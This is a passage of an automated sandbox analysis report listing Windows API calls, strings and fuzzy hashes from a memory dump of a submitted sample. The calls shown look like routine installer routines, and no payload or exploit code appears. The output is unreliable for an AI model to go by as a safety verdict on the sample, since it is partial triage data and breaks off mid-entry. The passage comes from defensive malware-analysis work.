                                                          • Instruction ID: ee0778b55076bf214b63aaf44073c79067fceb62e20c2f516a440ec7c4faf5ed
                                                          • Opcode Fuzzy Hash: 20d4d3efedc32434c77936c95fe9c73e42e1c540f2b792c07eccd7c7435f7152
                                                          • Instruction Fuzzy Hash: 2FF0FE70242302CAF750ABB5FDD97563694E7E471AF14237BE401551A1D7BD4444CB8C
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498130), ref: 004786BA
                                                          • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004786C7
                                                          • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004786D7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$HandleModule
                                                          • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                          • API String ID: 667068680-222143506
                                                          • Opcode ID: 037c1e48967f880c8f75eb608e42e3021eac6f548ba3101ad95a3bedc305e175
                                                          • Instruction ID: 2026d18a05cb2035c6a6e54b58e3f317de058d113ce64fa581f90165bcddcee3
                                                          • Opcode Fuzzy Hash: 037c1e48967f880c8f75eb608e42e3021eac6f548ba3101ad95a3bedc305e175
                                                          • Instruction Fuzzy Hash: F5C0E9F06C1701EA9640B7F15CDAD7A2558D520729720943F755EA6192D9BC4C104A6C
                                                          APIs
                                                          • GetFocus.USER32 ref: 0041B73D
                                                          • 73A1A570.USER32(?), ref: 0041B749
                                                          • 73A18830.GDI32(00000000,?,00000000,00000000,0041B814,?,?), ref: 0041B77E
                                                          • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041B814,?,?), ref: 0041B78A
                                                          • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B7F2,?,00000000,0041B814,?,?), ref: 0041B7B8
                                                          • 73A18830.GDI32(00000000,00000000,00000000,0041B7F9,?,?,00000000,00000000,0041B7F2,?,00000000,0041B814,?,?), ref: 0041B7EC
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: A18830$A122A26310A570Focus
                                                          • String ID:
                                                          • API String ID: 3906783838-0
                                                          • Opcode ID: 7028b3360e085542d185f93eaa985fb71498e3c9d3761fe797ea6f9089370fd6
                                                          • Instruction ID: 1a6b37f464f6ee1ac690d44aa7d10d16b676852f44f67843991ec4a9ec0a7b01
                                                          • Opcode Fuzzy Hash: 7028b3360e085542d185f93eaa985fb71498e3c9d3761fe797ea6f9089370fd6
                                                          • Instruction Fuzzy Hash: D9512070A002099FCF11DFA9C891AEEBBF8EF49704F10446AF514A7790D7799981CBA9
                                                          APIs
                                                          • GetFocus.USER32 ref: 0041BA0F
                                                          • 73A1A570.USER32(?), ref: 0041BA1B
                                                          • 73A18830.GDI32(00000000,?,00000000,00000000,0041BAE1,?,?), ref: 0041BA55
                                                          • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAE1,?,?), ref: 0041BA61
                                                          • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BABF,?,00000000,0041BAE1,?,?), ref: 0041BA85
                                                          • 73A18830.GDI32(00000000,00000000,00000000,0041BAC6,?,?,00000000,00000000,0041BABF,?,00000000,0041BAE1,?,?), ref: 0041BAB9
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: A18830$A122A26310A570Focus
                                                          • String ID:
                                                          • API String ID: 3906783838-0
                                                          • Opcode ID: 6afe2cc59a527faaede1d3d34b45dc336484c23e3dd063350b4c8de36bb0c79b
                                                          • Instruction ID: 148f6e74122d55113d3717465da8055643ee1b9490db959cdfcac8ccc7d3b8de
                                                          • Opcode Fuzzy Hash: 6afe2cc59a527faaede1d3d34b45dc336484c23e3dd063350b4c8de36bb0c79b
                                                          • Instruction Fuzzy Hash: FC513975A002089FDB11DFA9C881AAEBBF9FF49700F114466F904EB750D738AD40CBA8
                                                          APIs
                                                          • GetFocus.USER32 ref: 0041B576
                                                          • 73A1A570.USER32(?,00000000,0041B650,?,?,?,?), ref: 0041B582
                                                          • 73A24620.GDI32(?,00000068,00000000,0041B624,?,?,00000000,0041B650,?,?,?,?), ref: 0041B59E
                                                          • 73A4E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B624,?,?,00000000,0041B650,?,?,?,?), ref: 0041B5BB
                                                          • 73A4E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B624,?,?,00000000,0041B650), ref: 0041B5D2
                                                          • 73A1A480.USER32(?,?,0041B62B,?,?), ref: 0041B61E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: E680$A24620A480A570Focus
                                                          • String ID:
                                                          • API String ID: 3709697839-0
                                                          • Opcode ID: b97e33ea795034c912b2e17a9f5d54d6d1d1af920c0d7a51194e8edd97010b3d
                                                          • Instruction ID: df8759ecd31a85a201270414174f0a8fa00d18147156f7fa6755a0b35bba35d1
                                                          • Opcode Fuzzy Hash: b97e33ea795034c912b2e17a9f5d54d6d1d1af920c0d7a51194e8edd97010b3d
                                                          • Instruction Fuzzy Hash: E9410831A00258AFCB10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D50CBA5
                                                          APIs
                                                          • SetLastError.KERNEL32(00000057,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CED7
                                                          • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045CFA4,?,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CF16
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                          • API String ID: 1452528299-1580325520
                                                          • Opcode ID: 76cc67341227ff3c05617fb08029e3d04d7592c217e5ac47b77cb7a8c66e2160
                                                          • Instruction ID: 04ddcdc8736abbc18e914b4e1455ed0448250d7d0c77fa2ba5441d80ccfd4ce1
                                                          • Opcode Fuzzy Hash: 76cc67341227ff3c05617fb08029e3d04d7592c217e5ac47b77cb7a8c66e2160
                                                          • Instruction Fuzzy Hash: C7118736204304FFDB11DA91C9C2AAEB69EDB44746F6040776D00967C3D67C9F0AE56D
                                                          APIs
                                                          • GetSystemMetrics.USER32(0000000B), ref: 0041BDCD
                                                          • GetSystemMetrics.USER32(0000000C), ref: 0041BDD7
                                                          • 73A1A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDE1
                                                          • 73A24620.GDI32(00000000,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE08
                                                          • 73A24620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE15
                                                          • 73A1A480.USER32(00000000,00000000,0041BE5B,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE4E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: A24620MetricsSystem$A480A570
                                                          • String ID:
                                                          • API String ID: 4042297458-0
                                                          • Opcode ID: b7d5d08e3e19f48413646ae1536af481ff140cf83ce15b3b4f218d501696187d
                                                          • Instruction ID: 747e2eb1a3f7a7c841cace1b59abe43854f3131f67fff351bf4eed9cd228abed
                                                          • Opcode Fuzzy Hash: b7d5d08e3e19f48413646ae1536af481ff140cf83ce15b3b4f218d501696187d
                                                          • Instruction Fuzzy Hash: 98215974E00748AFEB10EFA9C942BEEBBB4EB48714F10842AF514B7280D7785D40CB69
                                                          APIs
                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0047DDAE
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CB69), ref: 0047DDD4
                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0047DDE4
                                                          • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047DE05
                                                          • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047DE19
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047DE35
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$Show
                                                          • String ID:
                                                          • API String ID: 3609083571-0
                                                          • Opcode ID: 69fb56ec72bb48bf799d73a9f514c3e84a97c3b26dbd79650f0c817e19817d20
                                                          • Instruction ID: 8d1f2698ea79badf96abf755c5a3f857121e06e6ffc739f26560ae4cefe558a1
                                                          • Opcode Fuzzy Hash: 69fb56ec72bb48bf799d73a9f514c3e84a97c3b26dbd79650f0c817e19817d20
                                                          • Instruction Fuzzy Hash: CA0112B5651610ABE700D768DE45F7637E8AF1C324F094266B659DF3E3C738E8408B49
                                                          APIs
                                                            • Part of subcall function 0041A6D8: CreateBrushIndirect.GDI32 ref: 0041A743
                                                          • UnrealizeObject.GDI32(00000000), ref: 0041B274
                                                          • SelectObject.GDI32(?,00000000), ref: 0041B286
                                                          • SetBkColor.GDI32(?,00000000), ref: 0041B2A9
                                                          • SetBkMode.GDI32(?,00000002), ref: 0041B2B4
                                                          • SetBkColor.GDI32(?,00000000), ref: 0041B2CF
                                                          • SetBkMode.GDI32(?,00000001), ref: 0041B2DA
                                                            • Part of subcall function 0041A050: GetSysColor.USER32(?), ref: 0041A05A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                          • String ID:
                                                          • API String ID: 3527656728-0
                                                          • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                          • Instruction ID: 416fc8ddf3b290ca22d08e3f0d0fa9d59de125dbf6d826fc2ec32e7be4b681d8
                                                          • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                          • Instruction Fuzzy Hash: 15F072B56015009FDF00FFAAD9C6E5F67989F043197048456B948DF197C93DD8505B3A
                                                          APIs
                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045397F
                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045398F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateFileHandle
                                                          • String ID: -cI$.tmp$_iu
                                                          • API String ID: 3498533004-3964432171
                                                          • Opcode ID: 02fc6949860a742288c4963694ea4c9fb07eaa5c322dedd883b179278d380901
                                                          • Instruction ID: 987f34639f2954820d3a171204f3ba7a53f2c28fb23a6faa943e541cb6d42ed5
                                                          • Opcode Fuzzy Hash: 02fc6949860a742288c4963694ea4c9fb07eaa5c322dedd883b179278d380901
                                                          • Instruction Fuzzy Hash: 293195B0A00249ABCB11EFA5C942BAEBBB4AF44309F60456AF800B73C2D6785F059758
                                                          APIs
                                                            • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                          • ShowWindow.USER32(?,00000005,00000000,004974CD,?,?,00000000), ref: 0049729E
                                                            • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                            • Part of subcall function 00407298: SetCurrentDirectoryA.KERNEL32(00000000,?,004972C6,00000000,00497499,?,?,00000005,00000000,004974CD,?,?,00000000), ref: 004072A3
                                                            • Part of subcall function 0042D444: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4D2,?,?,?,00000001,?,00456052,00000000,004560BA), ref: 0042D479
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                          • String ID: .dat$.msg$IMsg$Uninstall
                                                          • API String ID: 3312786188-1660910688
                                                          • Opcode ID: fee9eccc106b75620d129768861d1a7621c8bfd9450b5e9a776089888b3099eb
                                                          • Instruction ID: 502499af6c4fed57a8803849289841afdffa1b87ef326e8d9c35a034d288349d
                                                          • Opcode Fuzzy Hash: fee9eccc106b75620d129768861d1a7621c8bfd9450b5e9a776089888b3099eb
                                                          • Instruction Fuzzy Hash: 20317574A10214AFCB01EF65DC92D5E7BB5FB88318B51847AF800AB792D739BD05CB58
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EAD2
                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAD8
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB01
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressByteCharHandleModuleMultiProcWide
                                                          • String ID: ShutdownBlockReasonCreate$user32.dll
                                                          • API String ID: 828529508-2866557904
                                                          • Opcode ID: f0f9c1c29cdcfbee2e7a8f4e336c776c41a61f3b4eee9e965eb88e8c498f29e0
                                                          • Instruction ID: 08d6e73c43f4c72d4bf81f88f5f107f4332e42bd1359b104b354d246f0006fb7
                                                          • Opcode Fuzzy Hash: f0f9c1c29cdcfbee2e7a8f4e336c776c41a61f3b4eee9e965eb88e8c498f29e0
                                                          • Instruction Fuzzy Hash: 14F0F6D034062237E620B6BFAC82F7B59CC8F9472AF140036F109EB2C2E96C9905427F
                                                          APIs
                                                          • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                          • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                          • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                          • String ID: $O
                                                          • API String ID: 730355536-4089063739
                                                          • Opcode ID: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                          • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                          • Opcode Fuzzy Hash: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                          • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                          APIs
                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00457E48
                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00457E69
                                                          • CloseHandle.KERNEL32(?,00457E9C), ref: 00457E8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                          • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                          • API String ID: 2573145106-3235461205
                                                          • Opcode ID: fd83349507a0981e80b71893faadad776893e27a60c3cb1bdbbb378314d18f26
                                                          • Instruction ID: 364c7453444e38e17299d149b0285d9f966ded63b706bec2a35302b816cfa9f1
                                                          • Opcode Fuzzy Hash: fd83349507a0981e80b71893faadad776893e27a60c3cb1bdbbb378314d18f26
                                                          • Instruction Fuzzy Hash: 88018F71608304AFD711EBA99D03A2E73A9EB49715F6040B6FC10E72D3DA389D048619
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA68,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9BA
                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C0
                                                          • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressExchangeHandleInterlockedModuleProc
                                                          • String ID: ChangeWindowMessageFilter$user32.dll
                                                          • API String ID: 3478007392-2498399450
                                                          • Opcode ID: e1b8650f68b4f5373240c16350828cc36d4525f286b48015e4a1be8ef0f4b549
                                                          • Instruction ID: 012688e8468ec3177747178b84a01981fc81215c8fc8f9e453d059575ed0bd59
                                                          • Opcode Fuzzy Hash: e1b8650f68b4f5373240c16350828cc36d4525f286b48015e4a1be8ef0f4b549
                                                          • Instruction Fuzzy Hash: B5E0ECA1740314EAEA203B66BE8AF573558E724B19F54003BF100A51F2C7BC1C80CA9E
                                                          APIs
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00477630
                                                          • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477727,0049C0A4,00000000), ref: 00477643
                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477649
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProcProcessThreadWindow
                                                          • String ID: AllowSetForegroundWindow$user32.dll
                                                          • API String ID: 1782028327-3855017861
                                                          • Opcode ID: f9c0aa6575de5325031961dc8c28253599d1abb86677e5186b48b355b3ec359b
                                                          • Instruction ID: 000833d094a070652a329d30f0dc0cedfc4963abb7563544beb27e38e0473342
